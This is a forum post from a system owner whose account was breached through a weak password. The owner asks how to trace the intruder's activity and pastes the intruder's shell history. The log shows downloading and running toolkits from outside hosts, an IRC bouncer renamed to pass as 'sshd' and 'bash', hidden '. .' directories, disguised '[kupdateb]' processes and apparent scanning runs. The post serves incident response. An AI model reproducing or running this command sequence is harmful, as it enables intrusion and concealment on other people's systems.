View Single Post
  #1   (View Single Post)  
Old 30th June 2009
knasbas knasbas is offline
Port Guard
 
Join Date: May 2008
Posts: 25
Default weak password=broken

I just found out that a user had a weak password and it was broken. How do i trace what a user been doing?
Only see brief info in .bash_history (below)
Any help at all is welcome, ive changed password and deleted the 2 directorys ive found.
Not a single hit on robotbsd in google makes me a bit worried.
Code:
ls
ps 'ux
uname
uname -a
uptime
wget
w
passwd
ls
uname -a
fetch www.psybnc.net/psyBNC-2.3.2-7.tar.gz
wget
wget www.psybnc.net/psyBNC-2.3.2-7.tar.gz
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
ls
pico menuconf
pico config.h
ls
pico psybncchk
ls
pico CHANGES
make
ls
pico psybnc.conf
ls
rm -rf salt.h
mv psybnc sshd
export PATH="."
sshd
ps -ux
ls
exit
ps-ux
ps -ux
ls
kill -9 29089
ps -ux
kill -9 28097
ps -ux
ls
cd psybnc
ls
pico psybnc.conf
ls
sshd
export PATH="."
sshd
ps -ux
ls
exit
ls
-ps -ux
ls
ps -ux
ls
kill -9 12813
ls
ps -ux
ls
cd psybnc
ls
mv sshd bash
./bash
ps -ux
kill -9 12169
ls
cd ..
ls
wget badry.uv.ro/robotlinux.tgz
ls
tar xvf robotlinux.tgz
cd ". .".l
ls
pico mech.set
./[kupdateb]
[kupdateb]
export PATH="."
[kupdateb]
ls
exit
ls
ls -a
cd /var/tmp
mkdir roxy
cd roxy/
ls
ls -a
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
ls
pico m.session
ls
./[kupdateb]
chmod +x *
ls
[kupdateb]
./
[kupdateb]
ls
cd ..
ls
ls
exit
ls
ps -ux
cd psybnc
ls
cd ..
ls
rm -rf psybnc
ls
tar xvf psyBNC-2.3.2-7.tar.gz
tar xzvf psyBNC-2.3.2-7.tar.gz
ls
cd psybnc
ls
make
ls
mv psybnc bash
./bash
ps -ux
ls
w
uname -a
uptime
exit
ls
ps -ux
ls -a
exit
ps -ux
uname -a
uptime
ls -a
ls -a
exit
ps -ux
uname -a
ls -a
cd ". .".l
ls
./[kupdateb]
ls
cd /var/tmp
ls
ls
wget badry.uv.ro/robotbsd.tgz
ls
tar xvf robotbsd.tgz
ls
cd ". .".b
ls
./[kupdateb]
ls
ps -ux
uname -a
uptime
ls
cd ..
ls
ls
wget bucus.tvn.hu/wtf.tgz
ls
ftp
tar xvf wtf.tgz
ls
cd wtf
ls
./a 21.21
rm -rf a1
rm -rf scam
./a 53.21
exit
Reply With Quote